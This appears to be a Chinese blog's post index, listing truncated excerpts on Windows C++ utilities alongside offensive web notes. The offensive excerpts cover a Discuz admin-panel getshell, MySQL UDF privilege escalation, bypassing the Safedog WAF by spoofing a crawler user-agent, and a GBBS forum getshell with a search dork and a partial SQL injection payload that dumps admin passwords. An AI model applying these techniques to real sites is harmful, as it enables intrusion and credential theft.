原创 c++獲取進程的運行路徑
//獲取以系統內置帳戶運行的進程的運行路徑 wstring GetCurrentDirPath(void) { TCHAR wCurPath[MAX_PATH] = {0}; GetModuleFileNameW(NUL
2019-07-19 13:08:05
原创 c++釋放進程所佔內存--快速釋放內存
參考http://madcloudsong.com/articles/138中的方法 //此處只處理了32位的進程 #include #pragma comment (lib,"psapi.lib") //提升權限 void Ven
2019-07-19 13:08:05
原创 獲取系統臨時目錄
CString VengConfig::GetSysCheckTmpPath(void) { TCHAR TmpPath[MAX_PATH]={0}; LPITEMIDLIST pidl; LPMALLOC pS
2019-02-22 21:12:25
原创 把常見的編碼類型文件(ASCI、Unicode、utf-8)讀出到std::string中
int VengConfig::GetFileType(LPCTSTR lpszFileName) { CFile file; byte buf[3]= {0}; int tc; try
2018-09-12 02:37:30
1
原创 discuz 最新後臺getshell
原帖地址內容:http://zone.wooyun.org/content/3894用戶 – 用戶欄目 – 欄目分組 – 提交 – 抓包 (我就是在這步出錯的,一定要提交,不然抓到的數據包不一樣)1Content-Disposition:
2018-09-12 02:37:30
7
原创 服務器IE添加IP信任列表
//引用網上的一篇文章進行的修改 ,2003的所在註冊表位置和其他的系統位置不同 //hkey 是註冊表主鍵,如HKEY_LOCAL_MACHINE,szUrl爲IP地址(原文中有域名的添加方法,這裏去掉了) BOOL VengFunc
2018-09-12 02:37:29
1
原创 mysql 5.* udf提權之利用ADS創建lib\plugin目錄
剛在http://www.rabbit8.cn/MYSQL/395.html,看到建立lib\plugin目錄的方法.留個腳印查詢 select @@basedir (或者 select @@datadir)得到MySQL目錄 C:\MyS
2018-09-12 02:37:29
4
原创 獲取當前粘貼板數據
//獲取當前粘貼板數據//利用場景,用於半自動化,如獲取要執行的代碼,腳本上傳執行,獲取返回結果等if ( OpenClipboard(NULL) ) { HANDLE hData = GetClipboardD
2018-09-12 02:37:29
原创 GBBS微論壇getshell
1.google搜索:inurl:"userinfo.asp?yhm="2.注入exp:直接暴管理員密碼/userinfo.asp?yhm='%20union%20select%201,2,3,yhm%2bchr(35)%2bpass,5,
2018-09-12 02:37:29
1
原创 簡單繞過安全狗
轉自:http://www.cnseay.com/2751/ 僞造爬蟲的user-agent來進行繞過. 如果是你做網站,裝了WAF,肯定是會把搜索引擎的爬蟲放到白名單裏面,不然SEO就蛋疼了。 白名單意味着啥??? 就是說在白名單
2018-09-12 02:37:29
5
原创 GetTcpTable獲取開放的端口
////獲取tcp的連接信息 模擬netstat,此處只獲取本地開放的端口 ////獲取tcp的連接信息 模擬netstat,此處只獲取本地開發的端口 vector<int> VengConfig::EnumTCPTable()
2018-09-12 02:37:29
2